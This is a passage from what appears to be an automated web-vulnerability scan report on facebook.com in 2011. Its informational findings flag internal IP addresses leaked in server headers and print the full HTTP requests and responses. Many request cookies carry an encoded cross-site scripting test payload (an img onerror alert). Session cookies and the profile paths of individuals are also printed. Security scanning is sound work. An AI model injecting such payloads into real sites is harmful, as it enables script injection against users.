  • 10.52.168.65

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.195. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.33.16.121

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.196. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.145.27

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.27
Connection: close
Date: Thu, 05 May 2011 11:43:05 GMT
Content-Length: 20587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.197. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.139.61

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; made_write_conn=1304595678; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; W=1304595678

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: made_write_conn=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: W=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.61
X-Cnection: close
Date: Thu, 05 May 2011 11:44:15 GMT
Content-Length: 20118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.198. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.158.27

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.158.27
Connection: close
Date: Thu, 05 May 2011 11:43:04 GMT
Content-Length: 20551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.199. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.163.83

Request

GET /help/?page=432 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613664644%2F2; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.83
X-Cnection: close
Date: Thu, 05 May 2011 11:44:03 GMT
Content-Length: 24931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.200. http://www.facebook.com/home.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.103.77

Request

GET /home.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.77
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 0


20.201. http://www.facebook.com/images/policy/TRUSTe_EU.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/policy/TRUSTe_EU.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.193.31

Request

GET /images/policy/TRUSTe_EU.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/policy.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Sat, 04 Jun 2011 11:40:23 GMT
X-FB-Server: 10.52.193.31
X-Cnection: close
Date: Thu, 05 May 2011 11:40:23 GMT
Content-Length: 13208

...[SNIP]...

20.202. http://www.facebook.com/images/policy/TRUSTe_verify.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/policy/TRUSTe_verify.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.135.23

Request

GET /images/policy/TRUSTe_verify.png HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/policy.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/png
Expires: Sat, 04 Jun 2011 11:40:23 GMT
X-FB-Server: 10.52.135.23
X-Cnection: close
Date: Thu, 05 May 2011 11:40:23 GMT
Content-Length: 13670

...[SNIP]...

20.203. http://www.facebook.com/izaOllie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /izaOllie

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.195.35

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.204. http://www.facebook.com/jezzas

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /jezzas

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.105.45

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.205. http://www.facebook.com/kimberly.christ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /kimberly.christ

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.194.29

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fkimberly.christ; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.29
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 75242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.206. http://www.facebook.com/ladonna.lokey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ladonna.lokey

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.166.75

Request

GET /ladonna.lokey HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fladonna.lokey; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.75
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 68300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.207. http://www.facebook.com/lakendra.roberts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /lakendra.roberts

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.149.33

Request

GET /lakendra.roberts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flakendra.roberts; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.33
Connection: close
Date: Thu, 05 May 2011 11:42:24 GMT
Content-Length: 82530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.208. http://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.43.101.59

Request

GET /login.php?next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
